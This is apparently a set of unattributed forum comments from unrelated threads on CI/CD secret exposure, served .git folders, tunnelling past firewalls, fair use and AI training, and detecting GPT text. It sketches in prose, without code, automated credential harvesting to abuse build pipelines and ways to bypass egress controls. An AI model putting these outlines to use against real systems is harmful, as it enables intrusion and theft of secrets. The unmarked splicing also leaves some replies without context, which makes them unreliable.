No, in my YAML example, you could see that there were no credentials directly hard-coded into the pipeline. The credentials are configured separately, and the Pipelines are free to use them to do whatever actions they want.
This is how all major players in the market recommend you set up your CI pipeline. The problem here lies in implicit trust of the pipeline configuration which is stored along with the code.
Even with secrets if the CICD machine can talk to the internet, you could just broadcast the secrets to wherever (assuming you can edit the yaml and trigger the CICD workflow).
I was thinking maybe a better approach instead of CICD SSH into prod machine is to have the prod machine just listen to changes in git.
You're right, there are other avenues of exploitation. This particular approach was interesting to me because it is easily automatable (scour the internet for exposed credentials, clone the repo and detect if Pipelines are being used, profit).
Other exploits might need more targeted steps to achieve. For example, embedding a malware into the source code might require language / framework fingerprinting.
It's pretty common in systems where the final output to be deployed is the same as the root of the source tree. More often than not, lazy developers tend to just git clone the repo and point their web server's document root to the cloned source folder. In default configurations, .git is happily served to anyone asking for it.
This seems to be automatically mitigated in systems which might have a "build" / "compilation" phase, because for the application to work in the first place, you only need the compiled output to be deployed. For instance, Apache Tomcat.
Don't use this. I once tried it and it changed the UUID of the Linux partition without any warning. Grub was unable to pick up the partition and boot, so I was stuck at grub rescue.
Yeah I get it, but everyone needs to be responsible for security as well. Look what happened with Lastpass. I can totally see someone doing something silly like exposing a device with default creds like a MySQL db on a production box, then forgetting about it and getting a new job a year later.
I do block proxies like this, but it’s hard to block every little thing.
I remember when I believed in bastions and DMZ. Many companies have given up on this due to the fact that it can only be enforced by policy and not by tech
Ngrok is just one company tho, there are thousands of ways. Wireguard or nebula can be selfhosted and another server with an actual port open will forward traffic. People can use SSH's reverse port forwarding too.
Or you can use cloudflared or another one of ngrok's competitors.
You are wrong, though public interest is certainly the basis of the purpose of fair use doctrine. But the simplest way of demonstrating that fair use still allows commercialisation is probably this example: search engines absolutely depend on fair use if they include any content from the linked pages. (And some countries have even tried to call the act of linking copyright infringement, though they’ve tended to back off at least a little, to requiring at least the title or other content for it to be infringement, and not just the URL.)
It might be a problem to treat it as copyright. Copyright applies to reproduction, distribution, public performance... if I go to a library or bookstore and I read books and look at their covers, copyright does not apply. Would an android that walks around learning things be subject to copyright? To what extent does it need a body and mobility to be more like a person and less as a scraper?
It might seem stupid, but I worry that if copyright begins applying to "mining" then the next thing is that it applies to humans watching things.
Of course, if an AI re-creates copyrighted content, copyright should apply. Just like it applies when I redraw and sell the Mona Lisa, but not when I store it in my memory. I would pass on the responsibility to users. I don't fear my use of Github Copilot because it's far from infringing any reasonable copyright... then again, I'm assuming the most likely way to infringe copyright with GPT is to use a prompt that almost explicitly requests it.
Funny thing is that recreations are not necessarily covered by copyright law. The clearest example of this is fonts, where (using imprecise terminology but I think it’ll be clear enough) the US only grants copyright protection to font files, but not the shapes—so tracing a commercial font is perfectly legal, even if you happened to end up with an identical result (though good luck proving to a court that that’s what you did).
Detecting GPT generated content will take a fairly large language model to be reliable. Obviously this would need to be run in the cloud. Considering Apple's stance on privacy, sending private correspondence to the cloud is a huge no-no for them. Nobody is gonna implement GPT detection, atleast for emails.
This is how all major players in the market recommend you set up your CI pipeline. The problem here lies in implicit trust of the pipeline configuration which is stored along with the code.